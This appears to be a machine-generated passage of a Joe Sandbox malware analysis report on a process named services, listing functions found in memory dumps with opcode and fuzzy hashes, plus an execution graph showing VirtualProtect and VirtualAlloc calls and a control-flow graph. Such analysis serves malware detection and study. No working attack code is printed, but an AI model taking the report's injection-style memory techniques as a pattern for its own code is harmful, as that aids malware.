                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 78ac918baef89815894758ec1a64817b40d0c7b39d2d1edc5c9fd2c14b604c76
                                                                                                                                • Instruction ID: 8d576a9b703b3f6112f29c00a7912182be6adba1b443d77ac058cc1621c57f46
                                                                                                                                • Opcode Fuzzy Hash: 78ac918baef89815894758ec1a64817b40d0c7b39d2d1edc5c9fd2c14b604c76
                                                                                                                                • Instruction Fuzzy Hash: F751F732B1D7588FD7A4DB7884586797BE1FF59311B0501BEE49AD32A2DE24AC018741
                                                                                                                                Function 00007FFD9B7980CB Relevance: .1, Instructions: 123COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5fa22ff30006939a113f87d9428b448ff58fe27a447041004c161f3608116ec4
                                                                                                                                • Instruction ID: be3f51ccb21f78bdf627f62cb3254fe5217fca9d06cf073c6b26b0bb45ac6977
                                                                                                                                • Opcode Fuzzy Hash: 5fa22ff30006939a113f87d9428b448ff58fe27a447041004c161f3608116ec4
                                                                                                                                • Instruction Fuzzy Hash: C3519774E09A2D8EEBA4DF18C895BE9B7B5EB58301F5042EAD00DE2260DF755AC4CF41
                                                                                                                                Function 00007FFD9B7D6A21 Relevance: .1, Instructions: 110COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3c735c3b34a0648d3ba1c80b716ab92537002aea0df545e45cae0912b7216152
                                                                                                                                • Instruction ID: cccbd293fc432f8d389bb7ce937f8c5f4341ccc0af8931b92bbae692c74768e7
                                                                                                                                • Opcode Fuzzy Hash: 3c735c3b34a0648d3ba1c80b716ab92537002aea0df545e45cae0912b7216152
                                                                                                                                • Instruction Fuzzy Hash: 2F413D30A0960D8FDB58DF84C4A4AFCB7F2EF98340F114379D00AA72A1CA75A945CB40
                                                                                                                                Function 00007FFD9B7D76C6 Relevance: .1, Instructions: 87COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1a49369d20654a83358c9dc5262e118159151adec7b695a4a6fb768a791088ca
                                                                                                                                • Instruction ID: 2c928d855b810a908ea71f5d09922cc7225ed1dc366496bc94be4ddfb64c376c
                                                                                                                                • Opcode Fuzzy Hash: 1a49369d20654a83358c9dc5262e118159151adec7b695a4a6fb768a791088ca
                                                                                                                                • Instruction Fuzzy Hash: 88316E30E1A60D9FEB74DB48C8656ACB7F1FF98350F1107BAD009922A1DE746A898B41
                                                                                                                                Function 00007FFD9B7A8F2D Relevance: .1, Instructions: 86COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7ae34db3ba014f9b919f302d71597c985e746896575e7112fba29be21f1f02a2
                                                                                                                                • Instruction ID: d0b78a85958c62daf581801de736e219786b0677c3dbcd567cc15584c7f32aa9
                                                                                                                                • Opcode Fuzzy Hash: 7ae34db3ba014f9b919f302d71597c985e746896575e7112fba29be21f1f02a2
                                                                                                                                • Instruction Fuzzy Hash: 8E21C131A0964D8FDB58DF98D8616ED77F1FF98310F04027AD44AE32A1CA346A15CB81
                                                                                                                                Function 00007FFD9B790CB9 Relevance: .1, Instructions: 81COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ee7d0cff7c23c59cc1d44fdb0a035243d75d377616240398b44c9a7ba92034aa
                                                                                                                                • Instruction ID: 72fe3dee0f8a7c8ecbae391da4e9dba8ce81d988f1593a78a0edb16bfb8efe9f
                                                                                                                                • Opcode Fuzzy Hash: ee7d0cff7c23c59cc1d44fdb0a035243d75d377616240398b44c9a7ba92034aa
                                                                                                                                • Instruction Fuzzy Hash: 8E21B751B1E75A06E37C557C6C312B47BE1DF86A00F1802BEE49AC22F3ED0CAA0163C0
                                                                                                                                Function 00007FFD9B791575 Relevance: .1, Instructions: 80COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f0ba0ba13e71796900fb02da1ebcbf220b96008249a214b7da7fc0632ed6e3e9
                                                                                                                                • Instruction ID: 0d645b98cc7ec5af2c1b0636c8aa10b9a85c22fd8317cf599840e2cedfc3107a
                                                                                                                                • Opcode Fuzzy Hash: f0ba0ba13e71796900fb02da1ebcbf220b96008249a214b7da7fc0632ed6e3e9
                                                                                                                                • Instruction Fuzzy Hash: 28210436B0D39E8BD702AAA8DC211E97B70EF42321F0646B3C564C71D2CB342229C791
                                                                                                                                Function 00007FFD9B791EBD Relevance: .1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 35c1b6ab91db92f5a7a424c455160f5fb2ade2681897a27b6e290fc49af906e5
                                                                                                                                • Instruction ID: fa74a3159fba3c74776099648f2bed2b5c98d5cfd4256e9c0527b71c446b2a54
                                                                                                                                • Opcode Fuzzy Hash: 35c1b6ab91db92f5a7a424c455160f5fb2ade2681897a27b6e290fc49af906e5
                                                                                                                                • Instruction Fuzzy Hash: 33210C30A1851E9FDB94EFA4C8949BDB3F1FF28341B11067AD009D36A1DF34A945CB40
                                                                                                                                Function 00007FFD9B7B1A65 Relevance: .1, Instructions: 62COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c864e4ab8edd4d53d15d675a39d13779fd7215b70d0ac4ec926e641b0b597000
                                                                                                                                • Instruction ID: f264e32d909be89f4761c81c428ad9905ab7864e8d51855df4ba5f8430572cfe
                                                                                                                                • Opcode Fuzzy Hash: c864e4ab8edd4d53d15d675a39d13779fd7215b70d0ac4ec926e641b0b597000
                                                                                                                                • Instruction Fuzzy Hash: 51116731A08A4D8FDB40EF58C899AEA7BA0FF68304F0105AAE459C7261DB30A584CB80
                                                                                                                                Function 00007FFD9B791588 Relevance: .1, Instructions: 62COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3c1fe3a922c7de37c378ffdcfbfb61a6014f5bf4b6ad398f1b5277a01009917e
                                                                                                                                • Instruction ID: a3d1f67f177e8ae42f78f73b09569e3e5cacb0f197209a5ce3912caacb35fe5f
                                                                                                                                • Opcode Fuzzy Hash: 3c1fe3a922c7de37c378ffdcfbfb61a6014f5bf4b6ad398f1b5277a01009917e
                                                                                                                                • Instruction Fuzzy Hash: 2811B235B0D79A8FD702AAA4D8212E97B70EF42321F0546B7D464CB1E6CA346229C791
                                                                                                                                Function 00007FFD9B7D6D49 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3fb09e0197a403df23696308db349d9e8c924817d3a943f484a5b2912f0cea06
                                                                                                                                • Instruction ID: 906c05785851ce51883ff0717b0911cac5211a3104628eccf612d46512afa32f
                                                                                                                                • Opcode Fuzzy Hash: 3fb09e0197a403df23696308db349d9e8c924817d3a943f484a5b2912f0cea06
                                                                                                                                • Instruction Fuzzy Hash: 34113C30908A4D8FCF45EF58C858AEA7BF0FF29304F0105AAE859D72A1D7349554CB80
                                                                                                                                Function 00007FFD9B7AEF3B Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7396ab58f9001ba54bf10d0a75f4367bd4e13f9f3e6307431226981c22fdfdd0
                                                                                                                                • Instruction ID: fcd39bb3182657b82b33614c2a0b9112ec19452c5e68d546b0962efe0d90e764
                                                                                                                                • Opcode Fuzzy Hash: 7396ab58f9001ba54bf10d0a75f4367bd4e13f9f3e6307431226981c22fdfdd0
                                                                                                                                • Instruction Fuzzy Hash: F511BC70E0565DCFDBA4DF98C8A47ACB7B1FB58311F2046A6D00DD32A5DA386A85CB41
                                                                                                                                Function 00007FFD9B791598 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6ad0fe3754e455f4ba3714e8a8bacd44491901c15aa3f7d813b7c79be281cf3e
                                                                                                                                • Instruction ID: 1f91d8ea46ceb65d39cb551fc726b38b5062f9b68b5a27bc2189c5c8adaade83
                                                                                                                                • Opcode Fuzzy Hash: 6ad0fe3754e455f4ba3714e8a8bacd44491901c15aa3f7d813b7c79be281cf3e
                                                                                                                                • Instruction Fuzzy Hash: 2811C431E0D39A9FD702ABA4C8216E97BB0EF43310F0546B6D855CB1E6CF386628C791
                                                                                                                                Function 00007FFD9B794AC1 Relevance: .0, Instructions: 47COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f3af8060c204f28ff27ca4cee9dd8db22db466d3bda0e1072d3047dfbaf1ede4
                                                                                                                                • Instruction ID: e1e1a35d2cea414f502e7dd7e027e3085855797620a8e4d7dcbb6b4ee2ed6681
                                                                                                                                • Opcode Fuzzy Hash: f3af8060c204f28ff27ca4cee9dd8db22db466d3bda0e1072d3047dfbaf1ede4
                                                                                                                                • Instruction Fuzzy Hash: 5311E930A0561A8FEB68EB58C8587A9B3F1FF54305F4042E5E04DA26A5DE786A85CF84
                                                                                                                                Function 00007FFD9B7915A0 Relevance: .0, Instructions: 44COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b790000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a7b165f47e929bb7a713615454ab014037f78e4ecf62437d795a44172b0aeec5
                                                                                                                                • Instruction ID: 895f969706740ec331d5100e2f979bbfbbb87727ab3d667859f62a2f8ad3945c
                                                                                                                                • Opcode Fuzzy Hash: a7b165f47e929bb7a713615454ab014037f78e4ecf62437d795a44172b0aeec5
                                                                                                                                • Instruction Fuzzy Hash: 69019230E4D39A9FD712ABA488246E97BB0EF03314F0546B6D815CB1E6CE386628C791
                                                                                                                                Function 00007FFD9B7D94B9 Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 09f8b12c4c60efa117e91942d6f8b829233b56f32586ec26350072fd37c00845
                                                                                                                                • Instruction ID: 25d006bf9d9a41e8d42cbc5450464443c6549ab95b8513ecd78fb30143de358d
                                                                                                                                • Opcode Fuzzy Hash: 09f8b12c4c60efa117e91942d6f8b829233b56f32586ec26350072fd37c00845
                                                                                                                                • Instruction Fuzzy Hash: 58012C3090964D8FCF85DF64C859AEA7BF0FF69304F11059AE419D72A1D734AA54CB80
                                                                                                                                Function 00007FFD9B7D6E29 Relevance: .0, Instructions: 42COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 27075d54b2eed881d37b41f1a7e285fc9d13aaa23efee9fa6953b5d69f6af546
                                                                                                                                • Instruction ID: 69cf48f4844cdf9f9eeb8205fa2d572d7b31a6e1987d43558eeab74894d87d74
                                                                                                                                • Opcode Fuzzy Hash: 27075d54b2eed881d37b41f1a7e285fc9d13aaa23efee9fa6953b5d69f6af546
                                                                                                                                • Instruction Fuzzy Hash: A5016D30948A4D8FCF85EF54C898AEA7BB1FF69301F0501EAD409C71A1DB35EA94CB80
                                                                                                                                Function 00007FFD9B7D878A Relevance: .0, Instructions: 40COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f60f5fa282b96ac0b564c4387b5b106c66f39f9922249b454f16b64966556fc9
                                                                                                                                • Instruction ID: 6121cc6cfdf7800cd0b13eeeea26a7165c4f491ef1809142ea2fb47a828a8529
                                                                                                                                • Opcode Fuzzy Hash: f60f5fa282b96ac0b564c4387b5b106c66f39f9922249b454f16b64966556fc9
                                                                                                                                • Instruction Fuzzy Hash: 9F01C930914A4D9FDF84EF58C859AEA7BF1FF68305F1005AAE80DD7260DB31A594CB81
                                                                                                                                Function 00007FFD9B7B0894 Relevance: .0, Instructions: 40COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b6e19630e36310bca4057018f63a3de204a4d5604ef0a86d64c97c5a8454fe64
                                                                                                                                • Instruction ID: 52038b5e852814fbddff2b8248632864e6fc64374c92e2c0033579394de0b8e8
                                                                                                                                • Opcode Fuzzy Hash: b6e19630e36310bca4057018f63a3de204a4d5604ef0a86d64c97c5a8454fe64
                                                                                                                                • Instruction Fuzzy Hash: F801E835E0962D8BDB61DAA9D8186EEB3F1FF48310F104676C419E22A0DA756E15CF50
                                                                                                                                Function 00007FFD9B7DDBD3 Relevance: .0, Instructions: 38COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2f48c1b942be45e1b388f21d32ad2e4000991cd0f0e3a9ae4d38f1c606566007
                                                                                                                                • Instruction ID: bc0b75cb185ee6771e2f537770435261fbab041016eff62c713091d4e96844a9
                                                                                                                                • Opcode Fuzzy Hash: 2f48c1b942be45e1b388f21d32ad2e4000991cd0f0e3a9ae4d38f1c606566007
                                                                                                                                • Instruction Fuzzy Hash: FCF04F30A0864DDFCF45DF58D494AEA7BB0FF98305F1005AAE409D3160CB31A694CB81
                                                                                                                                Function 00007FFD9B7D94D0 Relevance: .0, Instructions: 36COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c4eb82aa514ce425112e84dcdb2091746e79800165bdd970e4566c7abdb8bd7f
                                                                                                                                • Instruction ID: 07889d2d95ba576d037870e959dd20b0dbb211b5c78663632c59e54500e494f5
                                                                                                                                • Opcode Fuzzy Hash: c4eb82aa514ce425112e84dcdb2091746e79800165bdd970e4566c7abdb8bd7f
                                                                                                                                • Instruction Fuzzy Hash: F5F09C7091494DCFDF84EF58C858AEE77F1FB68305F10455AA41DD3264DB719A54CB80
                                                                                                                                Function 00007FFD9B7D6E40 Relevance: .0, Instructions: 35COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 47aedc0da61b093dfe4ae6a87e754e2aeec25086e20fb1e2737a7a4d90ae2c07
                                                                                                                                • Instruction ID: a04488f30498e3eb23a7d9c21c6b32d5998267a8f534cc7aa42c00b0e61b6512
                                                                                                                                • Opcode Fuzzy Hash: 47aedc0da61b093dfe4ae6a87e754e2aeec25086e20fb1e2737a7a4d90ae2c07
                                                                                                                                • Instruction Fuzzy Hash: 36F0BD3091490D9FDF84EF58C458AAA7BF1FF68305F10459AA41DD3160DB71AA94CB81
                                                                                                                                Function 00007FFD9B7B0C45 Relevance: .0, Instructions: 24COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 27230450e8a7e77f2c2cd74ce05a9b3636f0261b2f7c2e8b76a0bad6b9540f09
                                                                                                                                • Instruction ID: f8aa6ec69c8102d64956de02404d871d271d35841d8ff1dfc3c9a616750478e9
                                                                                                                                • Opcode Fuzzy Hash: 27230450e8a7e77f2c2cd74ce05a9b3636f0261b2f7c2e8b76a0bad6b9540f09
                                                                                                                                • Instruction Fuzzy Hash: 88F06770E1A76DCEEBA09AA5885C7FDB6A0AF18701F1146B6D40D961B1DB386A81CE04

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:3.3%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:6
                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                execution_graph 18144 7ffd9b78295e 18145 7ffd9b78296d VirtualProtect 18144->18145 18147 7ffd9b782aad 18145->18147 18148 7ffd9b78434d 18149 7ffd9b78436f VirtualAlloc 18148->18149 18151 7ffd9b784485 18149->18151

                                                                                                                                Executed Functions

                                                                                                                                Function 00007FFD9B78B0DD Relevance: 1.3, Instructions: 1263COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 238 7ffd9b78b0dd-7ffd9b78b0ed 239 7ffd9b78b0ef 238->239 240 7ffd9b78b0f4-7ffd9b78ca87 call 7ffd9b78dc96 238->240 239->240 245 7ffd9b78ca89-7ffd9b78ca97 240->245 246 7ffd9b78caa2-7ffd9b78cb49 245->246 252 7ffd9b78cc56-7ffd9b78ccae 246->252 253 7ffd9b78cb4f-7ffd9b78cb66 246->253 264 7ffd9b78ce45-7ffd9b78cf21 252->264 265 7ffd9b78ccb4-7ffd9b78ccff 252->265 256 7ffd9b78cb68-7ffd9b78cbb3 253->256 257 7ffd9b78cbb4-7ffd9b78cc4d 253->257 256->257 257->252 287 7ffd9b78cc4f 257->287 298 7ffd9b78cf27-7ffd9b78d000 264->298 299 7ffd9b78d002-7ffd9b78d048 264->299 274 7ffd9b78ce2c-7ffd9b78ce39 265->274 276 7ffd9b78ce3f-7ffd9b78ce40 274->276 277 7ffd9b78cd04-7ffd9b78cd12 274->277 281 7ffd9b78d1fd-7ffd9b78d25c 276->281 279 7ffd9b78cd19-7ffd9b78cd99 277->279 280 7ffd9b78cd14 277->280 295 7ffd9b78cd9b 279->295 296 7ffd9b78cda0-7ffd9b78ce1a 279->296 280->279 294 7ffd9b78d524-7ffd9b78d551 281->294 287->252 304 7ffd9b78d557-7ffd9b78d57b call 7ffd9b78dcf9 294->304 305 7ffd9b78d261-7ffd9b78d29d 294->305 295->296 328 7ffd9b78ce1c-7ffd9b78ce21 296->328 329 7ffd9b78ce24-7ffd9b78ce29 296->329 318 7ffd9b78d04f-7ffd9b78d055 298->318 299->318 323 7ffd9b78d57d 304->323 324 7ffd9b78d584-7ffd9b78d5b8 304->324 313 7ffd9b78d2ba-7ffd9b78d521 305->313 314 7ffd9b78d29f-7ffd9b78d2b6 305->314 313->294 314->313 321 7ffd9b78d1ea-7ffd9b78d1f7 318->321 321->281 326 7ffd9b78d05a-7ffd9b78d068 321->326 323->324 336 7ffd9b78d5d8-7ffd9b78d5f5 324->336 337 7ffd9b78d5ba-7ffd9b78d5c7 324->337 330 7ffd9b78d06a 326->330 331 7ffd9b78d06f-7ffd9b78d10f 326->331 328->329 329->274 330->331 369 7ffd9b78d17f-7ffd9b78d1a7 331->369 370 7ffd9b78d111-7ffd9b78d139 331->370 343 7ffd9b78d5fb-7ffd9b78d6f9 336->343 344 7ffd9b78d7b4-7ffd9b78d7b8 336->344 340 7ffd9b78d5c9 337->340 341 7ffd9b78d5ce-7ffd9b78d5d6 337->341 340->341 341->336 343->344 400 7ffd9b78d6ff-7ffd9b78d70b 343->400 347 7ffd9b78dac7-7ffd9b78db1f 344->347 348 7ffd9b78d7be-7ffd9b78d7c7 344->348 366 7ffd9b78db25-7ffd9b78dbba 347->366 367 7ffd9b78dc87-7ffd9b78dc95 347->367 351 7ffd9b78d7c9-7ffd9b78d7ce 348->351 352 7ffd9b78d7d1-7ffd9b78d7da 348->352 351->352 355 7ffd9b78dab1-7ffd9b78dac1 352->355 355->347 359 7ffd9b78d7df-7ffd9b78d7f0 355->359 360 7ffd9b78d7f7-7ffd9b78d897 359->360 361 7ffd9b78d7f2 359->361 394 7ffd9b78d89d-7ffd9b78d8fd 360->394 395 7ffd9b78daa3-7ffd9b78daab 360->395 361->360 366->367 399 7ffd9b78dbc0-7ffd9b78dbd1 366->399 371 7ffd9b78d1a9 369->371 372 7ffd9b78d1ae-7ffd9b78d1d7 369->372 376 7ffd9b78d13b 370->376 377 7ffd9b78d140-7ffd9b78d17d 370->377 371->372 384 7ffd9b78d1e2-7ffd9b78d1e7 372->384 376->377 377->384 384->321 409 7ffd9b78d8ff 394->409 410 7ffd9b78d904-7ffd9b78d90d 394->410 395->355 402 7ffd9b78dbd8-7ffd9b78dc85 399->402 403 7ffd9b78dbd3 399->403 400->344 404 7ffd9b78d711-7ffd9b78d7a9 400->404 402->367 403->402 404->344 409->410 412 7ffd9b78da7c-7ffd9b78da8a 410->412 413 7ffd9b78d913-7ffd9b78d96b 410->413 417 7ffd9b78da8c 412->417 418 7ffd9b78da91-7ffd9b78da99 412->418 425 7ffd9b78d9f7-7ffd9b78da25 413->425 426 7ffd9b78d971-7ffd9b78d99d 413->426 417->418 419 7ffd9b78da9b-7ffd9b78daa0 418->419 419->395 427 7ffd9b78da27 425->427 428 7ffd9b78da2c-7ffd9b78da7a 425->428 429 7ffd9b78d99f 426->429 430 7ffd9b78d9a4-7ffd9b78d9f2 426->430 427->428 428->419 